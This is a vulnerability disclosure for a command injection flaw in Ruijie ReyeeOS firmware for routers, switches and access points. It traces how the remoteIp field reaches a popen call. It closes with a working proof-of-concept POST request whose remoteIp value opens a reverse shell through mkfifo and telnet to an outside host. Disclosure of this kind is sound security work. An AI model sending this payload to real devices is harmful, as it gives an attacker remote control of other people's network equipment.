Vendor of the products: Ruijie Networks
Vendor's website: https://www.ruijienetworks.com/
Reported by: Wang Jincheng(wjcwinmt@outlook.com) ,He Nan(2777256035@qq.com)
Affected products: RG-EW Series Routers and Repeaters, RG-NBS and RG-S1930 Series Switches, RG-EG Series business VPN Routers, RG-EAP and RG-RAP Series Wireless APs, RG-NBC Series Wireless Controllers
Affected firmware version: EW_3.0(1)B11P219, SWITCH_3.0(1)B11P219, EG_3.0(1)B11P219, AP_3.0(1)B11P219, AC_3.0(1)B11P219
Firmware download address: ReyeeOS219
A command injection vulnerability in RG-EW
series routers and repeaters v.EW_3.0(1)B11P219
, RG-NBS
and RG-S1930
series switches v.SWITCH_3.0(1)B11P219
, RG-EG
series business VPN routers v.EG_3.0(1)B11P219
, RG-EAP
and RG-RAP
series wireless access points v.AP_3.0(1)B11P219
, and RG-NBC
series wireless controllers v.AC_3.0(1)B11P219
allows an authorized attacker to execute arbitrary commands on remote devices by sending a POST request to /cgi-bin/luci/api/cmd
via the remoteIp
field.
Analyzing the /usr/lib/lua/luci/modules/cmd.lua
file reveals that operation types such as devConfig
or devSta
and operators such as get
or set
can be arbitrarily combined into different method
fields. For instance, when selecting the devConfig.get
method, it triggers the doParams(params)
function. The params
here is the JSON
data sent by the POST request. Subsequently, during the invocation of the fetch
function, it ultimately triggers the uf_client_call
function from /usr/lib/libunifyframe.so
. Following this, the data will be transmitted via socket
to /usr/sbin/unifyframe-sgi.elf
.
In the /usr/lib/libunifyframe.so
file, it is documented that the value of remoteIp
is parsed from a1[5]
, where a1
represents the base address of the JSON
data object. Moreover, a1
here is of type DWORD*
(four bytes here), making a1[5]
equivalent to *(a1+20)
, representing the remoteIp
field.
Within the /usr/sbin/unifyframe-sgi.elf
file, there exists a command injection vulnerability. The first formatting character %s
in the snprintf
function corresponds to *(a1+20)
, which represents the value of the params.remoteIp
field in the POST request. This value is user-controllable, ultimately leading to the execution of arbitrary commands when the ufm_popen
function is invoked.
Send the following POST request to /cgi-bin/luci/api/cmd
.
{
"method": "devConfig.get",
"params": {
"module": "123",
"remoteIp": "$(mkfifo /tmp/test;telnet 192.168.45.203 6666 0</tmp/test|/bin/sh > /tmp/test)",
"data": {
"kkk": "abc"
}
}
}